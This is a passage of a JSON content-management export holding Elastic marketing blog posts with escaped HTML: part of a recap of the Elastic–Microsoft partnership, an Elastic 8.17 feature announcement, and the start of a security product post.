cases.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIn addition to Microsoft Ignite and Microsoft Build, we collaborated on several conferences and events around the world:\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eMicrosoft Envision Hong Kong\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eMicrosoft AI Tour Paris\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eMicrosoft AI Create for ISVs\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eMicrosoft AI ISV Conference\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElasticONs (SFO, New York, Chicago)\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"Elastic at Microsoft Build 2024","_metadata":{"uid":"csf4ea6cb8af500e88"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElastic had an incredible week of demos, speaking sessions, interviews, and partnership with the Microsoft team at Build in Seattle. An important aspect was the integration of \u003c/span\u003e\u003ca href=\"https://www.elastic.co/search-labs/blog/azure-openai-on-your-data-elasticsearch-vector-database\"\u003e\u003cspan style='font-size: 12pt;'\u003eElasticsearch on Microsoft Azure OpenAI Service\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e as just the beginning of many AI-focused integrations that we delivered since Microsoft Build.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs1d37b84d51fe5618"}}},{"image":{"image":{"uid":"bltf06fc445c777ac52","_version":1,"title":"image8.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-12-11T19:29:53.462Z","updated_at":"2024-12-11T19:29:53.462Z","content_type":"image/png","file_size":"778668","filename":"image8.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-12-11T19:38:24.555Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltf06fc445c777ac52/6759e8314e7675921deef9ee/image8.png"},"_metadata":{"uid":"cs3bc569b7ff389fb8"},"caption_l10n":"","alt_text_l10n":"5 - enable search","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"Key moments","_metadata":{"uid":"cs9c95799bb19fa42d"},"header_style":"H3","paragraph_l10n":"\u003cul\u003e\u003cli\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Chief Product Officer Ken Exner took the stage for a live interview to discuss how \u003c/span\u003e\u003ca href=\"https://techcommunity.microsoft.com/blog/azure-ai-services-blog/azure-openai-service-expands-on-your-data-with-elasticsearch-to-revolutionize-co/4097023\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eElasticsearch is incorporated into the \"On Your Data\" feature within Microsoft’s Azure OpenAI Service\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e and the benefits this brings to developers.\u003c/span\u003e\u003c/li\u003e\u003c/ul\u003e"}],"_metadata":{"uid":"cs9384f32357ee9aa0"}}},{"image":{"image":{"uid":"bltdba444e41095c069","_version":1,"title":"Screenshot 2024-12-11 at 2.31.02 PM.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-12-11T19:31:18.145Z","updated_at":"2024-12-11T19:31:18.145Z","content_type":"image/png","file_size":"1908482","filename":"Screenshot_2024-12-11_at_2.31.02_PM.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-12-11T19:38:24.473Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltdba444e41095c069/6759e886e4620652d23eeb99/Screenshot_2024-12-11_at_2.31.02_PM.png"},"_metadata":{"uid":"cs8c2a95d75045580f"},"caption_l10n":"","alt_text_l10n":"6 - cpo ken exner talk","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":"width-large: 75%"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs97053902b12167d2"},"header_style":"H2","paragraph_l10n":"\u003cul\u003e\u003cli\u003e\u003cspan style='font-size: 12pt;'\u003eElastic teamed up with a customer, Stack Overflow, in a breakout session highlighting how Stack Overflow uses Elastic and Azure OpenAI for vector and semantic search capabilities, delivering a generative AI-powered experience to developers.\u003c/span\u003e\u003c/li\u003e\u003c/ul\u003e"}],"_metadata":{"uid":"cs181d448d225edae8"}}},{"image":{"image":{"uid":"blt8c4e728b7ef99d7f","_version":1,"title":"Screenshot 2024-12-11 at 2.32.14 PM.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-12-11T19:32:27.798Z","updated_at":"2024-12-11T19:32:27.798Z","content_type":"image/png","file_size":"1833690","filename":"Screenshot_2024-12-11_at_2.32.14_PM.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-12-11T19:38:24.426Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt8c4e728b7ef99d7f/6759e8cbcbd7d689f815acd8/Screenshot_2024-12-11_at_2.32.14_PM.png"},"_metadata":{"uid":"cs8a67980d35cb12fd"},"caption_l10n":"","alt_text_l10n":"7 - panel","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csc3e25bd0bbf9426e"},"header_style":"H2","paragraph_l10n":"\u003cul\u003e\u003cli\u003e\u003cspan style='font-size: 12pt;'\u003eJeff Vestal, principal customer enterprise architect at Elastic, provided a compelling live, on-stage demo about Elastic Observability and retrieval augmented generation (RAG).\u003c/span\u003e\u003c/li\u003e\u003c/ul\u003e"}],"_metadata":{"uid":"cs16acd1f9c35928fc"}}},{"image":{"image":{"uid":"blt69ef797ceda1b2cb","_version":1,"title":"image6.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-12-11T19:32:56.338Z","updated_at":"2024-12-11T19:32:56.338Z","content_type":"image/png","file_size":"574360","filename":"image6.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-12-11T19:38:24.514Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt69ef797ceda1b2cb/6759e8e8cbd7d6240915acdd/image6.png"},"_metadata":{"uid":"cs5fb3ea6a941af0dd"},"caption_l10n":"","alt_text_l10n":"8 - jeff vestal","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"Key announcements","_metadata":{"uid":"cs2405b1e577884726"},"header_style":"H3","paragraph_l10n":"\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/search-labs/blog/elasticsearch-vector-profile-azure\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElasticsearch delivers performance increase for users running the Elastic Search AI Platform on ARM-based architectures\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e: Benchmarking in preview provides Elasticsearch up to 37% better performance on Azure Cobalt 100 ARM-based VMs.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"https://www.elastic.co/search-labs/blog/elasticsearch-vector-profile-azure\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElastic Cloud adds Elasticsearch vector database optimized profile to Microsoft Azure\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e: A hardware profile optimized for applications that use Elasticsearch as a vector database to store dense or sparse embeddings for search and GenAI use cases powered by RAG.\u003c/span\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"Customer case studies","_metadata":{"uid":"cs5c5a55f33eb726f8"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eHelping customers address challenges and realize opportunities using Elastic solutions on Microsoft Azure fuels this strategic partnership. Below are a handful of these examples.\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/customers/stack-overflow\"\u003e\u003cspan style='font-size: 12pt;'\u003eStack Overflow rolls out generative AI using Elasticsearch and Azure Open AI\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 11pt;'\u003e.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"http://marketresearch.com\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eMarketResearch.com uses Elastic to search millions of documents on its subscription platform Profound and provides customers with critical information about markets, competitors, and consumers\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 11pt;'\u003e.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/customers/snc\"\u003e\u003cspan style='font-size: 12pt;'\u003eSierra Nevada Corp establishes a robust, in-house security operations center with Elastic while scaling to ingest a tenfold increase in data\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 11pt;'\u003e.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/customers/radio-canada?jul25\"\u003e\u003cspan style='font-size: 12pt;'\u003eRadio-Canada boosts operation performance by 200% with Elastic on Azure\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 11pt;'\u003e.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"https://www.elastic.co/customers/hexaware\"\u003e\u003cspan style='font-size: 12pt;'\u003eGenerative AI transforms IT operations at Hexaware\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(52, 55, 65);font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"Looking ahead ","_metadata":{"uid":"csce9c5b1aa11427ae"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eOur partnership with Microsoft is founded on a shared vision of empowering organizations to maximize the potential of their data. As we look into the future, we are excited to innovate and deliver solutions that help customers migrate to the cloud faster, adopt AI smarter, and take GenAI workloads to the next level with Elasticsearch. All of these are underpinned by \u003c/span\u003e\u003ca href=\"https://techcommunity.microsoft.com/blog/azureobservabilityblog/explore-the-latest-features-for-elastic-cloud-elasticsearch---an-azure-native-is/4288091\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eElastic’s native integration within Microsoft Azure\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, where we continue to integrate Elastic solutions natively within Microsoft Azure even further.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eStay tuned for more exciting advancements from Elastic and Microsoft in 2025 as we continue to innovate and expand upon our joint successes!\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs39309e188299a9e3"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs48d1010157eed600"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='color:rgb(49, 51, 63);font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='color:rgb(49, 51, 63);font-size: 10pt;'\u003e\u003cem\u003eIn this blog post, we may have used or referred to third party generative AI tools, which are owned and operated by their respective owners. Elastic does not have any control over the third party tools and we have no responsibility or liability for their content, operation or use, nor for any loss or damage that may arise from your use of such tools. Please exercise caution when using AI tools with personal, sensitive or confidential information. Any data you submit may be used for AI training or other purposes. There is no guarantee that information you provide will be kept secure or confidential. You should familiarize yourself with the privacy practices and terms of use of any generative AI tools prior to use.\u0026nbsp;\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='color:rgb(49, 51, 63);font-size: 10pt;'\u003e\u003cem\u003eElastic, Elasticsearch, ESRE, Elasticsearch Relevance Engine and associated marks are trademarks, logos or registered trademarks of Elasticsearch N.V. in the United States and other countries. All other company and product names are trademarks, logos or registered trademarks of their respective owners.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs789e9705b80200e2"}}}],"publish_date":"2024-12-11","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[],"tags_industry":[],"tags_partner":[{"uid":"bltada2311dae66943e","_content_type_uid":"tags_partner"}],"tags_topic":[{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt99b075caf3df4ca7","ACL":{},"created_at":"2023-11-06T21:41:39.171Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"generative-ai","label_l10n":"Generative AI","tags":[],"title":"Generative AI","updated_at":"2023-11-06T21:41:39.171Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.390Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt8617d65f559b9a82","ACL":{},"created_at":"2023-11-06T20:42:46.365Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"microsoft-azure","label_l10n":"Microsoft Azure","tags":[],"title":"Microsoft Azure","updated_at":"2023-11-06T20:42:46.365Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:39:19.197Z","user":"blt06083bb707628f5c"}}],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"bltcb543cd010a1e2a8","ACL":{},"created_at":"2020-06-17T03:33:30.831Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"cloud","label_l10n":"Cloud","tags":[],"title":"Cloud","updated_at":"2020-07-06T22:20:17.019Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:05:21.552Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"bltc9e9e28445da8fc7","_version":1,"title":"msignite-2024.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-12-11T19:04:51.491Z","updated_at":"2024-12-11T19:04:51.491Z","content_type":"image/png","file_size":"135050","filename":"msignite-2024.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-12-11T19:38:24.536Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltc9e9e28445da8fc7/6759e253fbbc1d04ce094a2d/msignite-2024.png"},"title":"Elastic and Microsoft in 2024: Celebrating innovation and partnership at Ignite","title_l10n":"Elastic and Microsoft in 2024: Celebrating innovation and partnership at Ignite","updated_at":"2024-12-11T19:37:48.208Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/elastic-microsoft-ignite-2024-partnership","publish_details":{"time":"2024-12-11T19:38:23.879Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blte0520a2cda44f4ae","_version":1,"locale":"en-us","ACL":{},"abstract_l10n":"Elastic 8.17 includes capabilities like Elasticsearch logsdb index mode (dramatically reduces the storage footprint of log data in Elasticsearch up to 65%), Elastic Rerank model for semantic boost, full-text search for ES|QL, and more. ","author":["blt39dee51344f15656"],"category":["bltfaae4466058cc7d6"],"created_at":"2024-12-11T17:47:19.027Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eToday, we are pleased to announce the general availability of Elastic 8.17!\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eFast on the heels of Elastic 8.16 that was released just a month ago, we focused Elastic 8.17 on fast-tracking key features that will unlock storage savings and search performance benefits.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThese features include:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe general availability of the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eElasticsearch logsdb index mode\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe technical preview of the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eElastic Rerank model\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe technical preview of\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003e full-text search for Elasticsearch Query Language (ES|QL)\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e and\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003e \u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003emore\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eKeep reading for details!\u003c/span\u003e\u003c/p\u003e","_metadata":{"uid":"csc7c4aecce62f8a6e"}},{"title_l10n":"Elasticsearch logsdb index mode","header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eLogs are the simplest and most crucial signal for diagnosing issues, especially as AI advancements enable easier analysis of text-based data.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWith the general availability of the Elasticsearch specialized logsdb index mode, Elastic has dramatically reduced the storage footprint of log data in Elasticsearch by up to 65%. This allows you to store more observability and security data without exceeding your budget while keeping all data accessible and searchable. Logsdb index mode enables index sorting and advanced compression techniques like ZSTD, delta encoding, and run-length encoding.\u003c/span\u003e\u003cbr /\u003e\u003cbr /\u003e\u003cspan style='font-size: 12pt;'\u003eFind more details in the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/search-labs/blog/elasticsearch-logsdb-index-mode\"\u003e\u003cspan style='font-size: 12pt;'\u003elogsdb index mode blog\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e or in the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/welcome-to-elastic/current/new.html\"\u003e\u003cspan style='font-size: 12pt;'\u003e8.17 release notes\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e","_metadata":{"uid":"cs9f22bc86f395055c"}},{"title_l10n":"Elastic Rerank","header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eReranking models provide a semantic boost to any search experience without requiring a change in the schema of your data. This gives you room to explore other relevance tools for semantic relevance on your own time and within your budget.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e8.17 provides a semantic boost for full-text search with a highly performant and efficient semantic reranking model. The technical preview of Elastic Rerank model — in addition to the ability to integrate with third-party models for semantic reranking — makes it much easier to get started with relevance tuning.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eFind more details in the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/search-labs/blog/elastic-rerank-model-introduction\"\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Rerank blog\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e or in the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/welcome-to-elastic/current/new.html\"\u003e\u003cspan style='font-size: 12pt;'\u003e8.17 release notes\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e","_metadata":{"uid":"csea13606a1525ab98"}},{"title_l10n":"Full-text search for ES|QL","header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe technical preview of new \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eMATCH\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e and query string (QSTR) functions in ES|QL makes log searches easier and more intuitive. \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eMATCH\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e delivers full-text search functionality in ES|QL using a Lucene match query, while QTSR aids in more advanced filtering of log data by enabling Lucene query string queries.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eFull-text search for ES|QL enables easier and more performant searching in Discover, especially when dealing with multiple terms or conditional logic.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThese new search functions in ES|QL offer a substantial performance improvement. Queries can now run 50x–1000x faster than equivalent RLIKE queries, especially on larger data sets. The addition of this feature to ES|QL allows you to take advantage of one of the main benefits of Elastic — the ability to index all data in advance — thereby doing the heavy lifting once and enabling really fast full-text search later.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAll of this aligns closely with Elasticsearch DSL functions for better feature parity, intuitiveness, and speed in your search. ES|QL also offers complete geosearch capabilities with significantly improved latency for sorting by distance.\u003c/span\u003e\u003c/p\u003e","_metadata":{"uid":"csdeeffca33d413613"}},{"title_l10n":"Query rules with retrievers","header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe general availability of query rules with retrievers enables you to now use query rules for hybrid search use cases, making it possible to combine several search methods and pin or exclude certain results. This is especially useful for ecommerce and merchandising use cases for sales promotions or targeted results.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e","_metadata":{"uid":"csdec5acff9e0bade8"}},{"title_l10n":"Elastic Cloud SAML SSO","header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eSimplify enterprise access management with SAML single sign-on (SSO) — now generally available for Elastic Cloud. Otherwise known as Bring Your Own Identity Provider (BYOIdP), our new SSO capability eliminates complex, repetitive authentication and authorization configurations by allowing you to set up a single, centralized identity management solution across your entire Elastic Cloud environment.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eKey benefits include:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eStreamlined user onboarding with automatic organizational membership and account provisioning\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eEnhanced security through centralized authentication enforcement across your organization\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eGranular access control by seamlessly mapping Identity Provider (IdP) groups directly to Elastic Cloud roles\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eReduced administrative overhead by configuring SAML SSO once at the Control Plane level\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e","_metadata":{"uid":"csd0bd75877099baf1"}},{"title_l10n":"From Logs Explorer to Discover","header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWe are working toward providing a central and even more contextual experience for log analytics in Discover. See the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/kibana/8.17/release-notes-8.17.0.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eKibana release notes\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e for a list of changes and deprecations that will enable Discover to be the one stop for all logging workflows.\u003c/span\u003e\u003c/p\u003e","_metadata":{"uid":"csc7d1b9ab31eac1cf"}},{"title_l10n":"Start today","header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eReady to get started? Elastic 8.17 is\u003c/span\u003e\u003cspan style='color:rgb(52, 55, 65);font-size: 12pt;'\u003e \u003c/span\u003e\u003ca href=\"https://cloud.elastic.co/registration?elektra=whats-new-elastic-8-7-0-blog\"\u003e\u003cspan style='font-size: 12pt;'\u003enow available on Elastic Cloud\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e — the hosted Elasticsearch service that includes all of the new features in this latest release.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e","_metadata":{"uid":"cs94c19eeba37e52c7"}},{"title_l10n":"","header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e","_metadata":{"uid":"csc3d448af6ef5a2f2"}}],"_metadata":{"uid":"cs46842d1fb054e76c"}}}],"publish_date":"2024-12-12","sanity_migration_complete":false,"seo":{"seo_title_l10n":"Elastic 8.17: Elasticsearch logsdb index mode, Elastic Rerank, and more ","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[],"tags_industry":[],"tags_partner":[],"tags_topic":[],"tags_use_case":[{"_version":1,"locale":"en-us","uid":"bltbc86a233655f4b8e","ACL":{},"created_at":"2022-09-13T16:43:08.111Z","created_by":"blt36e890d06c5ec32c","hidden_value":false,"keyword":"elasticsearch","label_l10n":"Elasticsearch","tags":[],"title":"Elasticsearch","updated_at":"2022-09-13T16:43:08.111Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.253Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"bltbfc2a5b510122be8","_version":1,"title":"8.17-blog-2x.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-12-11T17:39:33.966Z","updated_at":"2024-12-11T17:39:33.966Z","content_type":"image/png","file_size":"150256","filename":"8.17-blog-2x.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-12-12T17:02:05.791Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltbfc2a5b510122be8/6759ce55cc57be5a24036867/8.17-blog-2x.png"},"title":"Elastic 8.17: Elasticsearch logsdb index mode, Elastic Rerank, and more","title_l10n":"Elastic 8.17: Elasticsearch logsdb index mode, Elastic Rerank, and more","updated_at":"2024-12-11T17:47:19.027Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/whats-new-elastic-8-17-0","publish_details":{"time":"2024-12-12T17:02:05.609Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt3a367056087c822b","_version":3,"locale":"en-us","ACL":{},"abstract_l10n":"Elastic Security combines CDR with SIEM to deliver crucial context, prioritized threat detection, and rapid response for a more efficient security posture.","author":["bltb0cc3d711c5c0b3a","blt2197c290679d2e28","blt65b0d48a762d02b4"],"category":["blt0c9f31df4f2a7a2b"],"created_at":"2024-12-02T18:22:00.173Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs64de39dfdc99455e"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElastic eliminates the need for a separate \u003c/span\u003e\u003ca href=\"https://www.elastic.co/security/cloud-detection-and-response\"\u003e\u003cspan style='font-size: 12pt;'\u003ecloud detection and response 